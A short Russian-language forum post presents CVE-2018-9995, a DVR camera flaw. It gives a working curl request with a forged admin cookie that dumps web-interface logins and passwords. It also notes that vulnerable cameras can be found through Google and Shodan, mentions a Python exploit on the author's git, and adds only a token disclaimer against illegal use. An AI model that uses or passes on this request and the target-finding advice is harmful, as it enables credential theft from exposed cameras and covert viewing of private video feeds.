CVE-2018-9995 или как получить логин и пароль к DVR камере
@webwareПриветствую, форумчане. Не так давно была обнаружена уязвимость, затрагивающая довольно большое количество камер.
Брешь позволяет одним запросом вытащить логины и пароли к веб интерфейсу DVR устройства, откуда, кстати, можно смотреть трансляцию/запись камеры, менять настройки и всё в этом духе.
Собственно запрос
curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
Камеры неплохо "гуглятся" и находятся в шодане.
Не советую использовать всё это дело в незаконных целях (я должен был это сказать), по крайней мере потому, что подглядывать не хорошо
На гите автора есть эксплоит на питоне (хотя по мне проще написать свой)